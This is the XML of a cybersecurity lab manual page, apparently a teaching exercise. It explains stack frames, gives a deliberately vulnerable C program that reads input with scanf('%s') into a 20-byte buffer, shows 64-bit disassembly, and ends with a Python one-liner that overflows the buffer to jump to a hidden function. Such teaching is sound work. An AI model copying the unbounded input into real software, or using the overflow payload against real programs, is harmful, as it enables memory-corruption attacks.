      </w:pP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Assume our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ip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is pointing to the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func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call in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main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. The following steps would be taken:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F712E" w:rsidRPr="008F712E" w:rsidRDefault="008F712E" w:rsidP="00961839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 xml:space="preserve">A function call is found, push parameters on the stack from right to </w:t>
      </w:r>
      <w:r w:rsidR="005C356D" w:rsidRPr="008F712E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>left (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in reverse order). So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2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will be pushed first and then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1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:rsidR="008F712E" w:rsidRPr="008F712E" w:rsidRDefault="008F712E" w:rsidP="00961839">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="324"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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We need to know where to return after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func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is completed, so push the address of the next instruction on the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F712E" w:rsidRPr="008F712E" w:rsidRDefault="008F712E" w:rsidP="00961839">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="324"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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Find the address of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func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and set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ip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to that value. The control has been transferred to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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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func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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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)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:rsidR="008F712E" w:rsidRPr="008F712E" w:rsidRDefault="008F712E" w:rsidP="00961839">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="324"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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As we are in a new function we need to update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bp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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. Before updating we save it on the stack so that we can return later back to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main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. So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bp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is pushed on the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F712E" w:rsidRPr="008F712E" w:rsidRDefault="008F712E" w:rsidP="00961839">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="324"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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Set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bp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to be equal to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esp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bp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now points to current stack pointer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F712E" w:rsidRPr="008F712E" w:rsidRDefault="008F712E" w:rsidP="00961839">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="324"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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Push local variables onto the stack/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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reserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> space for them on stack.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proofErr w:type="gram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sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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will be changed in this step.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F712E" w:rsidRPr="008F712E" w:rsidRDefault="008F712E" w:rsidP="00961839">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="324"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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After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func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gets over we need to reset the previous stack frame. So set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proofErr w:type="gram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sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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back to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bp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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. Then pop the earlier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bp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from stack, store it back in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bp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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. So the base pointer register points back to where it pointed in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main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:rsidR="008F712E" w:rsidRPr="008F712E" w:rsidRDefault="008F712E" w:rsidP="00961839">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="324"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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Pop the return address from stack and set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%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eip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to it. The control flow comes back to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main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, just after the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func</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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function call.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F712E" w:rsidRPr="008F712E" w:rsidRDefault="008F712E" w:rsidP="00961839">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr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This is how the stack would look while in</w:t>
      </w:r>
      <w:r w:rsidRPr="00961839">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00961839">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:bdr w:val="single" w:sz="6" w:space="1" w:color="D5D5E9" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F712E"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:rsidR="008F712E" w:rsidRPr="008F712E" w:rsidRDefault="008F712E" w:rsidP="00BF6DB0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="300" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F712E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2494915" cy="1654175"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175"/>
            <wp:docPr id="6" name="Picture 6" descr="Stack layout during function c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tack layout during function call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915" cy="165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42B1D" w:rsidRDefault="00442B1D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00442B1D" w:rsidRDefault="00442B1D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>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004076B9" w:rsidRDefault="004076B9" w:rsidP="004076B9">
      <w:pPr>
        <w:pStyle w:val="Heading1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lastRenderedPageBreak/>
        <w:t>Source Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004076B9" w:rsidRPr="004076B9" w:rsidRDefault="004076B9" w:rsidP="004076B9"/>
    <w:p w:rsidR="008E5E02" w:rsidRDefault="00467BA8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//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>vuln.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spell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tdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spell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&gt;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proofErr w:type="gram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void</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:t>
      </w:r>
      <w:proofErr w:type="spell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ecretFunction</w:t>
      </w:r>
      <w:proofErr w:type="spell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()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{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ab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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printf</w:t>
      </w:r>
      <w:proofErr w:type="spell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(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"Congratulations!\n");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ab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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printf</w:t>
      </w:r>
      <w:proofErr w:type="spell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(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"You have entered in the secret function!\n");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}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proofErr w:type="gram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void</w:t>
      </w:r>
      <w:proofErr w:type="gram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echo()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{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ab/>
      </w:r>
      <w:proofErr w:type="gram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char</w:t>
      </w:r>
      <w:proofErr w:type="gram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buffer[20];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ab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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printf</w:t>
      </w:r>
      <w:proofErr w:type="spell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(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"Enter some text:\n");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ab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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scanf</w:t>
      </w:r>
      <w:proofErr w:type="spell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(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"%s", buffer);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ab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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printf</w:t>
      </w:r>
      <w:proofErr w:type="spell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(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"You entered: %s\n", buffer);</w:t>
      </w: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ab/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}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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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main()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{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ab/>
      </w:r>
      <w:proofErr w:type="gram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echo(</w:t>
      </w:r>
      <w:proofErr w:type="gram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);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ab/>
      </w:r>
      <w:proofErr w:type="gramStart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return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E5E02" w:rsidRPr="008E5E02" w:rsidRDefault="008E5E02" w:rsidP="008E5E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8E5E02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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E5E02" w:rsidRDefault="008E5E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E5E02" w:rsidRDefault="008E5E02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 w:rsidP="00CB3E3C">
      <w:pPr>
        <w:pStyle w:val="Heading1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lastRenderedPageBreak/>
        <w:t>Possible Problem:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3E3C" w:rsidRPr="00CB3E3C" w:rsidRDefault="00CB3E3C" w:rsidP="00CB3E3C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3E3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>If you use 64bits machine.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3E3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> You will see something like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3E3C" w:rsidRPr="00CB3E3C" w:rsidRDefault="00CB3E3C" w:rsidP="00CB3E3C">
      <w:pPr>
        <w:spacing w:after="225" w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2A2E2E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB3E3C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2A2E2E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>00000000004005f6 &lt;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secretfunction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>&gt;:</w:t>
      </w:r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>4005f6: 55 push %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rbp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 xml:space="preserve">4005f7: 48 89 e5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mov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%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rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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,%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3E3C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2A2E2E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>rbp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 xml:space="preserve">4005fa: bf f8 06 40 00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mov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$0x4006f8,%edi</w:t>
      </w:r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 xml:space="preserve">4005ff: e8 ac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fe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ff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ff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callq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4004b0 &lt;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puts@plt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>&gt;</w:t>
      </w:r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 xml:space="preserve">400604: bf 10 07 40 00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mov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$0x400710,%edi</w:t>
      </w:r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 xml:space="preserve">400609: e8 a2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fe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ff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ff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callq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4004b0 &lt;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puts@plt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>&gt;</w:t>
      </w:r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 xml:space="preserve">40060e: 90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nop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>40060f: 5d pop %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rbp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 xml:space="preserve">400610: c3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retq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CB3E3C" w:rsidRPr="00CB3E3C" w:rsidRDefault="00CB3E3C" w:rsidP="00CB3E3C">
      <w:pPr>
        <w:spacing w:after="0" w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2A2E2E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB3E3C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2A2E2E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>0000000000400611 &lt;echo&gt;:</w:t>
      </w:r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>400611: 55 push %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rbp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 xml:space="preserve">400612: 48 89 e5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mov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%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rsp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>,%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rbp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 xml:space="preserve">400615: 48 83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ec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20 sub $0x20,%rsp</w:t>
      </w:r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 xml:space="preserve">400619: bf 39 07 40 00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mov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$0x400739,%edi</w:t>
      </w:r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 xml:space="preserve">40061e: e8 8d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fe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ff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ff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callq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 xml:space="preserve"> 4004b0 &lt;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puts@plt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>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3E3C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2A2E2E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>400623: 48 8d 45 e0 lea -</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3E3C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>0x20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3E3C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2A2E2E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>(%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rbp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3E3C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2A2E2E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>),%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3E3C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2A2E2E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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How to fix?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3E3C" w:rsidRDefault="00CB3E3C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB3E3C" w:rsidRDefault="00CB3E3C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2A2E2E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2A2E2E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>You need to use 32 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3E3C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>0x20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2A2E2E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>) +8=40 then it came right as its 64 bit=8byte for register</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A422E5" w:rsidRDefault="00CB3E3C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2A2E2E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2A2E2E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c 'print "a"*40 + "\xf6\x05\x40\x00\x00\x00\x00\x00"' | ./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2A2E2E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A422E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006542B7" w:rsidRPr="00770985" w:rsidRDefault="006542B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770985">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reference</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00770985" w:rsidRPr="00770985" w:rsidRDefault="00770985" w:rsidP="00770985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bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770985">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>http://www.cis.syr.edu/~wedu/seed/lab_env.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B877EE" w:rsidRPr="00770985" w:rsidRDefault="00797D49" w:rsidP="00797D49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bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00797D49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B877EE" w:rsidRPr="00770985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6687" w:rsidRDefault="00216687" w:rsidP="00EB2649">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00216687" w:rsidRDefault="00216687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79BB" w:rsidRDefault="004779BB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F638F2" w:rsidRPr="00AF6EFD" w:rsidRDefault="00F638F2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CE4AB7" w:rsidRPr="00CE4AB7">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r w:rsidRPr="00AF6EFD">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w:rsidR="009C26E5" w:rsidRPr="009C26E5" w:rsidRDefault="009C26E5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6687" w:rsidRDefault="00216687" w:rsidP="00EB2649">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00216687" w:rsidRDefault="00216687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2649" w:rsidRPr="0074054E" w:rsidRDefault="00EB2649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>Cybersecurity Lab Manual</w:t>
    </w:r>
    <w:r w:rsidR="009C26E5" w:rsidRPr="0074054E">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print" w:cs="Arial"/>
        <w:b/>
        <w:sz w:val="28"/>
      </w:rPr>
      <w:t xml:space="preserve">       </w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="009C26E5" w:rsidRPr="009C26E5" w:rsidRDefault="009C26E5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>
    <w:nsid w:val="22751294"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EDF8E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0B36F12"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8EBE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6E2424B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E208C9B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>
    <w:nsid w:val="73FF425C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27C62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F757807"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EDF8E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6"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="4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kFAB4qz5YtAAAA"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00615E00"/>
    <w:rsid w:val="00006176"/>
    <w:rsid w:val="00011777"/>
    <w:rsid w:val="000170C8"/>
    <w:rsid w:val="00042B97"/>
    <w:rsid w:val="000532E1"/>
    <w:rsid w:val="00056774"/>
    <w:rsid w:val="00076903"/>
    <w:rsid w:val="000A1411"/>
    <w:rsid w:val="001564AB"/>
    <w:rsid w:val="00175849"/>
    <w:rsid w:val="00186F68"/>
    <w:rsid w:val="00216687"/>
    <w:rsid w:val="002823B1"/>
    <w:rsid w:val="002E4979"/>
    <w:rsid w:val="002E55F8"/>
    <w:rsid w:val="002E5842"/>
    <w:rsid w:val="00303E10"/>
    <w:rsid w:val="00307B16"/>
    <w:rsid w:val="0032426B"/>
    <w:rsid w:val="003712DA"/>
    <w:rsid w:val="003D630F"/>
    <w:rsid w:val="003E7934"/>
    <w:rsid w:val="003F4759"/>
    <w:rsid w:val="004076B9"/>
    <w:rsid w:val="00435965"/>
    <w:rsid w:val="00442B1D"/>
    <w:rsid w:val="0044590F"/>
